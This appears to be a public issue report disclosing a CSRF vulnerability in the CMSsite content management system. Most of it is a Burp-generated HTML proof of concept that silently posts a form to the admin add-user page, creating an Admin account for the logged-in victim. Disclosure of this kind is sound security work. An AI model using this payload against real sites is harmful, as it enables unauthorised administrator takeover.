CMSsite icon indicating copy to clipboard operation
CMSsite copied to clipboard

Published 20 hours ago verified publisher icon VictorAlagwu

CMSsite CSRF vulnerability

Open byck01 opened this issue 6 years ago • 0 comments

  • Adding a user without a token for authentication; causing a csrf vulnerability

2019-02-28 10 01 48

  • Construct the following poc; save as html and open will trigger the csrf vulnerability ( test1 to manage users)
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/127.0.0.1\/CMSsite-master\/admin\/users.php?source=add_user", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "zh-cn");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryr5YfcjoxNznTbZFG");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundaryr5YfcjoxNznTbZFG\r\n" + 
          "Content-Disposition: form-data; name=\"user_name\"\r\n" + 
          "\r\n" + 
          "test1\r\n" + 
          "------WebKitFormBoundaryr5YfcjoxNznTbZFG\r\n" + 
          "Content-Disposition: form-data; name=\"user_firstname\"\r\n" + 
          "\r\n" + 
          "test1\r\n" + 
          "------WebKitFormBoundaryr5YfcjoxNznTbZFG\r\n" + 
          "Content-Disposition: form-data; name=\"user_lastname\"\r\n" + 
          "\r\n" + 
          "test1\r\n" + 
          "------WebKitFormBoundaryr5YfcjoxNznTbZFG\r\n" + 
          "Content-Disposition: form-data; name=\"user_image\"; filename=\"test.gif\"\r\n" + 
          "Content-Type: image/gif\r\n" + 
          "\r\n" + 
          "123455\r\n" + 
          "------WebKitFormBoundaryr5YfcjoxNznTbZFG\r\n" + 
          "Content-Disposition: form-data; name=\"user_role\"\r\n" + 
          "\r\n" + 
          "Admin\r\n" + 
          "------WebKitFormBoundaryr5YfcjoxNznTbZFG\r\n" + 
          "Content-Disposition: form-data; name=\"user_email\"\r\n" + 
          "\r\n" + 
          "[email protected]\r\n" + 
          "------WebKitFormBoundaryr5YfcjoxNznTbZFG\r\n" + 
          "Content-Disposition: form-data; name=\"user_password\"\r\n" + 
          "\r\n" + 
          "test123\r\n" + 
          "------WebKitFormBoundaryr5YfcjoxNznTbZFG\r\n" + 
          "Content-Disposition: form-data; name=\"create_user\"\r\n" + 
          "\r\n" + 
          "Add User\r\n" + 
          "------WebKitFormBoundaryr5YfcjoxNznTbZFG--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

byck01 avatar Feb 28 '19 02:02 byck01